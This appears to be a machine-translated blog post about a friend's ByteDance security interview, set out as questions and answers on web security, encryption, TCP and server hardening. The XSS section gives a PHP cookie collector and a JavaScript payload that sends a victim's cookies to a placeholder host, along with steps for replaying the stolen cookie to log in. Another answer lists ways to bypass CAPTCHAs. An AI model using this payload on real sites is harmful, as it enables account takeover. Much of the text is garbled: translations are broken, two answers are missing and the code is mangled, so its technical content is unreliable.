Some time ago, a friend of mine went out for an interview again. This time, his interview objectives were relatively clear, and all of them were the departments with large volumes of business and relatively core business. Back and forth to many companies, several large factories, he said that gave him the deepest impression is byte.

With 3 rounds of technical interviews and 1 round of HR interviews, he finally got the Offer of 40K *18 salary.

The first round focuses on the basics of Web security, while the second and third rounds focus on the mastery of corresponding penetration technology and the business understanding of previous projects. He was impressed because each round lasted more than an hour and a half, which really benefited him a lot.

He chose Byte, not only because it was the core project, but also because Byte boasts the best benefits in the industry and the highest salaries in its category.

“High salary, good development and excellent benefits” seems to have become a label for Bytedance.

And many people think that the threshold of Dachang is high:

“Jagamoto double non – education can not enter the big factory!”

“Work less than 3 years can not enter the big factory!”

“If you graduate from a non-professional class, you can’t get into a big factory!

But for me this dregs this double non graduate friend, enter byte, it seems that is not so difficult. In his words, entry to Dachang depends on one thing: technical strength.

As long as you have good technical skills and perform well in the interview, you will get the Offer.

One side

1, a login page will have what security problems?

Weak password, burst, SQL injection, sensitive information leakage

2. Which programming language are you most familiar with?

This is because we have only recently learned Python, although I have learned some Java and C ++ in the required course, but I feel that I can not speak it out.

3. What have you done with Python?

Fortunately, I also wrote a simple POC in Python last month,

4. Write libraries commonly used in POC?

RE (regular request library), REQUEST (network request library)

5. How to prevent violent cracking?

Limit login times and add multiple authentication

6. What are the ways to bypass CAPTCHA?

Bypass the CAPTCHA. Skip the captcha and go directly to the desired page content.

The verification code comes with the request header. Some sites will have a CAPTCHA in front of the JS verification server generated CAPTCHA in the request header. You can get the request header and parse out the CAPTCHA.

Session does not refresh. Some website verification code verification success, direct access to the request resources. (forgetting the verification code corresponding to the refresh cookie) A cookie and verification code can be set in advance. Use this vulnerability to access the website. For multi-threading can not be controlled and some website verification code periodically do not access the failure problem. You can add a timed access program to solve this problem

Leverage third-party plug-ins. For some sites, the verification code is simpler. Contains only Arabic numerals and English letters. It can be identified by third-party plug-ins. For example: Tess4J, Tesseract

Some sites have CAPTCHAs that are taken from a library at random. For this type of static CAPTCHA. You can build your own CAPTCHA static library. Set up a good picture and verification code to answer the link. The mapping method of map can be used to identify.

7. The command to view the current directory in Windows?


8. View the current command on Linux?


9. View the information and permissions of the current file

ls -al

10. What is the CTF responsible for?

I work in support…

11. Do you work out CTF problems independently?

Of course,

To say the least, even if you do not go to Dachang, but if you want to go further on the road of technology, want to become a technology leader, to scale up the system, you must understand the basic knowledge.

In the penetration test, port scanning, vulnerability scanning, intrusion detection, red team attack, blue team defense and so on are related to the network protocol, so it is very important for the penetration test personnel to learn the basic knowledge, and it is a necessary skill to become a Danniu.

Out of 10 programmers, 10 said they had learned about network security, and 9 said they knew about network security. But in an actual interview, only two or three people can answer relevant questions. Such as:

“What’s the difference between TCP and UDP?” “What is the underlying principle of the HTTPS protocol?” “Dubbo of Ali

What transport and serialization protocols does the framework use?”

Can you figure it out? In fact, those who have participated in the interview should know that whether IT is a domestic Internet giant or a Silicon Valley IT company, the interview will ask about basic knowledge.

This is not difficult to understand, after all, the major companies pay more attention to the basic skills of programmers, and almost all the program will be involved in the operation of the network protocol, once the wrong can easily have disastrous consequences.

Here’s an example:

Many people have been plagued by “technology changes too fast and becomes obsolete”, from search engine, big data, cloud computing to artificial intelligence, blockchain… And so on. In fact, a lot of technology looks spectacular, stripped down to the basics and core concepts of “computer building principles, operating systems, network protocols, data structures and algorithms.”

The way to avoid being eliminated by the new technology rolling in is to master the core essential knowledge. They’re not like, “X days will get you done

Things like “MySQL” will help you get a job more easily, but that knowledge is still valuable when you’re 40 years old.

Two or three surface

What is the Penetration Test Process

The preliminary interaction stage, the intelligence gathering stage, the threat modeling stage, the vulnerability analysis stage, the Exploitation stage, the post-penetration attack stage (how to control and maintain access all the time), and the reporting stage.

Before the attack: network check points, network scanning, network check points

In the attack: use vulnerability information to carry out infiltration attack and obtain permissions

Post – attack: post – penetration maintenance attack, file copy, Trojan implant, trace erasure

How does XSS defend itself

1. Filtering and coding the front-end input: for example, only specified types of characters are allowed to be entered, such as telephone number format, registered user name limitation, etc. Input check needs to be completed at the server side, and the limitation completed at the front-end is easy to be bypassed; Filtering and escaping special characters;

2. Filtering and encoding the output: Encode and escape the variable value when it is output to the front-end HTML;

3. Use HTTP-ONLY for key cookies

Symmetric encryption Asymmetric encryption?

Symmetric encryption: encryption and decryption with the same key, key maintenance complex n (n-1) /2, not suitable for the Internet transmission of key, encryption and decryption efficiency is high. Apply to encrypt data.

Asymmetric encryption: the public key cannot be pushed out of the private key, and each user can have an asymmetric key pair. It is suitable for the transmission of the public key in the Internet, but the encryption efficiency is low, so it is applied to digital signature and encryption

Where are the cookies stored? Can I open it?

C:\Users\ User \AppData\ Microsoft\Windows\Cookies Tool – Fold Options – View – Remove the check box of the hidden protected file and you will see the Cookies File folder

How does XSS steal cookies?

Attacker code:

$cookie=$_GET['cookie']; . $time=date('Y-m-d g:i:s'); . $referer=getenv('HTTP_REFERER'); . $cookietxt=fopen('cookie.txt','a'); . fwrite($cookietxt,"time:".$time." cookie:".$cookie." referer:".$referer.""); Pay attention to double quotation marks, easy to make mistakes.. fclose($cookietxt); . ?

The script end:

document.write('<img src="http://ip/cookie.php? cookie='+document.cookie+'" width=0 height=0 border=0 />'); . </script>

After getting the cookie, use Firebug to find the cookie, create a new cookie to join the cookie, use Referer to submit, do not need to enter the account password directly log in!

What should be done to protect the IIS server?

  1. Keep Windows Upgrade:
  2. Use IIS prevention tools
  3. Removes the default Web site
  4. If you do not need FTP and SMTP services, please uninstall them
  5. Regularly check your admin groups and services:
  6. Strictly control write access to the server
  7. Set a complex password
  8. Reduce/exclude sharing on the Web server
  9. Disable NetBIOS in TCP/IP protocol:
  10. Blocking using the TCP port
  11. Carefully checkThe bat and.exe file: Search *.bat once a week
  12. Managing IIS Directory Security:
  13. Safe to use NTFS:
  14. Manage user accounts
  15. Auditing your Web server:

TCP handshake protocol:

In TCP/IP protocol, TCP protocol provides reliable connection service, using three handshakes to establish a connection.

First handshake: When the connection is established, the client sends the SYN packet (SYN = J) to the server and enters the SYN_SEND state, waiting for the server to confirm;

The second handshake: The server receives the SYN packet and must confirm the client’s SYN (ACK = J +1). At the same time, it also sends a SYN packet (ACK = K), i.e. SYN+ACK. The server enters the SYN_RECV state.

The third handshake: The client receives the server’s SYN+ACK packet and sends the acknowledgement packet ACK(ACK = K +1) to the server. After the packet is sent, the client and the server enter the ESTABLISHED state and complete the third handshake.

How is DVWA built?

Start XAMPP (XAMPP (Apache+MySQL+PHP+ Perl) is a powerful web-building integration package. Under the Apache middleware and MySQL put DVWA in the XAMPP htdocs directory in the browser input can be used!

And owasp loopholes practice platform:…

XSS must have a cookie can useless username password login?

Pretty much. Because if you give the browser the value of the cookie, the browser will go to the page and use the cookie it already has, and if the cookie is valid, it will go directly to the page.

HR side

1. Late development planning

2. When are you prepared to make a functional change?

3 for customers to do the value of security services, is how to reflect, help customers to solve what problems

4. Permeable penetration test and code audit at work

Elementary – vulnerability scanning

Intermediate – Independent penetration test capability

Advanced – Code audit projects

Learning roadmap

Metal surface by

Penetration kit

Network Security Introduction to Advanced Books (HD PDF version)

SRC Vulnerability Summary

Web security learning video

Emergency Response Notes

[Data Collection]